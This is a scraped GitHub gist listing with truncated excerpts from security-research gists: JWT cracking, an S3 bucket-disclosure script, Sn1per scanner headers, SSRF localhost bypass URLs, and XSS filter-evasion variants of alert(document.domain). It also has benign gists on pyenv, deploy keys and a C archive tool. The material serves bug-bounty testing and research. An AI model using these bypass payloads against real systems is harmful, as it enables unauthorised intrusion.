Skip to content

Instantly share code, notes, and snippets.

View ruevaughn's full-sized avatar

Chase Jensen ruevaughn

76 followers · 263 following
View GitHub Profile
@pich4ya
pich4ya / crack_jwt.txt
Last active June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
@fransr
fransr / bucket-disclose.sh
Last active October 20, 2025 12:32
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@luzfcb
luzfcb / installing_pyenv_on_ubuntu_based_distros.md
Last active April 18, 2025 22:04
Quick install pyenv and Python

Tested only on Ubuntu 24.04, KDE Neon User Edition (based on Ubuntu 24.04) and OSX Mojave or higher.

will probably work on other newer versions, with no changes, or with few changes in non-python dependencies (apt-get packages)

NOTE: Don't create a .sh file and run it all at once. It may will not work. Copy, paste, and execute each command below manually. :-)

Ubuntu

# DO NOT RUN THIS AS A ROOT USER
@hrbrmstr
hrbrmstr / aa-msp-modules-by-port.r
Last active February 6, 2022 17:40
Ref: https://twitter.com/omespino/status/1000524541829971968
library(stringi)
library(tidyverse)
list.files("~/Development/metasploit-framework/modules", recursive = TRUE, full.names = TRUE) %>%
map_df(~{
dat <- read_lines(.x)
data_frame(
fil = basename(.x),
contents = list(
dat %>%
@bayotop
bayotop / bypasses.txt
Last active August 21, 2024 20:08
Various useful bypasses
# SSRF localhost (@omespino)
http://127.0.0.1
http://[::]/ # ipv6
http://0/
http://localtest.me # dns to 127.0.0.1
http://2130706433/ # decimal
http://0x7f000001/ # hex
http://0x7f.0x00.0x00.0x01 # hex
http://0177.0.0.01 # octal
@holmberd
holmberd / deploy-keys.md
Last active February 11, 2024 20:36
Setup GitHub repository SSH deploy keys

Setup GitHub repository SSH deploy keys

  1. Create GitHub repository in github and save the SSH repository url

  2. Init git on server in code directory

  • git init
  1. Create SSH keys on the server
  • ssh-keygen -t rsa -b 4096 -C [email protected]
  • Rename the key that doesn't end with .pub to repo-name.deploy.pem
@1N3
1N3 / Sn1per v4.4 (Beta)
Created March 21, 2018 00:05
#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
#
VER="4.4"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="/usr/share/sniper/plugins"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
@jhaddix
jhaddix / Testing_Checklist.md
Last active September 22, 2025 03:46 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@stek29
stek29 / efirestool.c
Last active January 5, 2024 13:25
efirestool -- tool to work with APPL efires archives
#include <sys/types.h>
#include <unistd.h> // write
#include <fcntl.h> // open, close
#include <stdio.h> // fprintf
#include <string.h> // strerror, strdup, strchr
#include <stdlib.h> // free, EXIT_*
#include <sys/mman.h> // mmap, munmap
#include <sys/stat.h> // fstat
#include <errno.h> // errno
#include <dirent.h> // DIR, dirent, opendir, readdir
@tomnomnom
tomnomnom / alert.js
Last active October 27, 2025 04:03
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);